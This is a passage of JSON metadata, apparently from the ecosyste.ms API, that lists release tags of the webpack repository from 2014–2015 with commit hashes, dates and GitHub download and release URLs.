cosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"bdabadf34f871fd19b1f960df6b8ab15ea915154","kind":"commit","published_at":"2015-01-21T19:25:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"558ee89277d41529ff143af8e050f4c2917ea4b6","kind":"commit","published_at":"2015-01-17T23:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"0e36e7e936b126dba526bddac557566ee982c432","kind":"commit","published_at":"2015-01-17T22:43:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0/manifests"},{"name":"v1.4.15","sha":"431bd659be6dcd35fbe993a3a528d5774e82f745","kind":"commit","published_at":"2014-12-28T00:26:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15/manifests"},{"name":"v1.4.14","sha":"6c45e24e4039f7298bfa8ca08a9614abc7aeaf08","kind":"commit","published_at":"2014-12-22T14:29:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14/manifests"},{"name":"v1.4.13","sha":"34c509740b722ac9898ed262f88a8bba9d3237b7","kind":"commit","published_at":"2014-11-05T23:28:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13/manifests"},{"name":"v1.4.12","sha":"5edcaea76d900134a50e5a16a07ab5da75c80c6a","kind":"commit","published_at":"2014-11-03T07:10:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12/manifests"},{"name":"v1.4.11","sha":"8c606b490b248000466cc5be01019ce7d2eea407","kind":"commit","published_at":"2014-11-02T12:18:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11/manifests"},{"name":"v1.4.10","sha":"9a375a770a9b1b235361dcda92844acad196dd47","kind":"commit","published_at":"2014-10-31T11:46:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10/manifests"},{"name":"v1.4.9","sha":"b02ef8b2c386d34441af4b42aab248aeed014214","kind":"commit","published_at":"2014-10-26T10:19:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9/manifests"},{"name":"v1.4.8","sha":"c6e1a8fb6d8714dec5bd05b7a6ae80b71b6e0262","kind":"commit","published_at":"2014-10-16T20:31:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8/manifests"},{"name":"v1.4.7","sha":"4c0e1974e5c49ee4063cf301d49dc977f77a85b6","kind":"commit","published_at":"2014-10-13T14:10:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7/manifests"},{"name":"v1.4.6","sha":"f0997230f35361ab62c2300133aece93f3ca1cc3","kind":"commit","published_at":"2014-10-12T10:30:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"272d7219cdec5f041e98e2163078c6d2ea772bdf","kind":"commit","published_at":"2014-10-07T13:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5/manifests"},{"name":"v1.4.4","sha":"2bcb6f9bca77d5d4a42efface7c1e274412b5b64","kind":"commit","published_at":"2014-09-26T06:54:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"91c7426e4595f0d3c45efc9c1e17b40d875e6de2","kind":"commit","published_at":"2014-09-23T06:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3/manifests"},{"name":"v1.4.2","sha":"c117ec46eaa149d3732157744467e58b2baf4517","kind":"commit","published_at":"2014-09-22T21:51:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2/manifests"},{"name":"v1.4.1-beta1","sha":"c59727720e4bf1feb5a1939b69154ceec0111ed0","kind":"commit","published_at":"2014-09-19T06:13:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1/manifests"},{"name":"v1.4.0-beta10","sha":"4afdc81bc4fa95fad705957f335ab48c6f7feb9a","kind":"commit","published_at":"2014-09-17T21:25:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10/manifests"},{"name":"v1.4.0-beta9","sha":"4e79c9f245c3df0173cb75312cde5f1c51c902f6","kind":"commit","published_at":"2014-09-16T17:36:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9/manifests"},{"name":"v1.4.0-beta8","sha":"bd02534a588b4ddc2893b5d222836f7c8df8447e","kind":"commit","published_at":"2014-09-15T11:33:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8/manifests"},{"name":"v1.4.0-beta7","sha":"81748e167a80d79454f44564ca146179b9692e6d","kind":"commit","published_at":"2014-09-15T11:27:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7/manifests"},{"name":"v1.4.0-beta6","sha":"2eed5961b0433ed22fd0a8d825f7ff15fd0dbeb1","kind":"commit","published_at":"2014-09-11T18:22:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6/manifests"},{"name":"v1.4.0-beta5","sha":"911b62cfcb702a5971c67a6e2b4f100118bd26e2","kind":"commit","published_at":"2014-09-10T12:10:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5/manifests"},{"name":"v1.4.0-beta4","sha":"89db931fb0ab82a6a46bb7afa4ae57126d555090","kind":"commit","published_at":"2014-09-07T20:55:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4/manifests"},{"name":"v1.4.0-beta3","sha":"970e16d69b64df94b1d7f5dcf8e0f6c25cc2ff61","kind":"commit","published_at":"2014-09-03T12:16:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3/manifests"},{"name":"v1.4.0-beta2","sha":"a912045bd428f3970762a49457e1d5d95316f3c5","kind":"commit","published_at":"2014-08-29T14:08:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2/manifests"},{"name":"v1.4.0-beta1","sha":"b014b77d7f7de8d5b2f3d8aa0ca2bda1e948fc1d","kind":"commit","published_at":"2014-08-27T15:18:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1/manifests"},{"name":"v1.3.7","sha":"b9a84f89d40e618357c17430eb61f76ccf48bef2","kind":"commit","published_at":"2014-08-25T14:34:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7/manifests"},{"name":"v1.3.6","sha":"19b618133a121d2fad838e74b0879fa94dfeef3d","kind":"commit","published_at":"2014-08-25T11:38:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6/manifests"},{"name":"v1.3.5","sha":"382635d711081fb6fedb75719e4c7f0e1e40f766","kind":"commit","published_at":"2014-08-25T08:45:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5/manifests"},{"name":"v1.3.4","sha":"b9ac3fa3c77d64856503013a7262efd5b368a199","kind":"commit","published_at":"2014-08-25T08:20:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4/manifests"},{"name":"v1.3.3-beta2","sha":"2a419ccbeab05d91a9f14fa6ac1e2037678d8f29","kind":"commit","published_at":"2014-08-14T09:34:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2/manifests"},{"name":"v1.3.3-beta1","sha":"5a447ad7c39b63c037f56daf6df7d1df9074d1c8","kind":"commit","published_at":"2014-08-03T19:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1/manifests"},{"name":"v1.3.2-beta9","sha":"a7d7c4ca2fb245d22fa98944d32acfff4746ac44","kind":"commit","published_at":"2014-07-28T22:15:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9/manifests"},{"name":"v1.3.2-beta8","sha":"18ad6548134d5ff40fd04633e8e1375ddb005cc1","kind":"commit","published_at":"2014-07-26T15:54:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8/manifests"},{"name":"v1.3.2-beta7","sha":"0dd1a69b97161df01a6bdd41d5f32bb4135af50a","kind":"commit","published_at":"2014-07-26T12:48:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7/manifests"},{"name":"v1.3.2-beta6","sha":"7f6f44df1bb9ca055ac0eaed89aa0dca4e8dc6fa","kind":"commit","published_at":"2014-07-24T15:54:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6/manifests"},{"name":"v1.3.2-beta5","sha":"cca21ee10756dbb8edb6fb283391f304a197295f","kind":"commit","published_at":"2014-07-24T13:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5/manifests"},{"name":"v1.3.2-beta4","sha":"8d90c0f5b5998ebaf3e61ac443ec01a223d456e9","kind":"commit","published_at":"2014-07-23T12:42:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4/manifests"},{"name":"v1.3.2-beta3","sha":"d76600101ccc5aef0be148909a336baf3d2ccfce","kind":"commit","published_at":"2014-07-19T12:35:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3/manifests"},{"name":"v1.3.2-beta2","sha":"9d4cbb125445f4c2bb99c5b55a16c3255ae1d247","kind":"commit","published_at":"2014-07-18T11:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2/manifests"},{"name":"v1.3.2-beta1","sha":"0ab5a3e993386b54afab416b5bc02747658469e6","kind":"commit","published_at":"2014-07-17T00:06:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1/manifests"},{"name":"v1.3.1-beta9","sha":"53c38582e6ceb31aefab5237b042148dd6712151","kind":"commit","published_at":"2014-07-16T18:57:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9/manifests"},{"name":"v1.3.1-beta8","sha":"6c50e7c3883ac24c4f3dcd7b8a11f9545c230589","kind":"commit","published_at":"2014-07-09T11:37:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8/manifests"},{"name":"v1.3.1-beta7","sha":"287984cb54ed896c85778dc1874ec05195b99a11","kind":"commit","published_at":"2014-07-07T11:22:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta7","html_url":"https://github.com/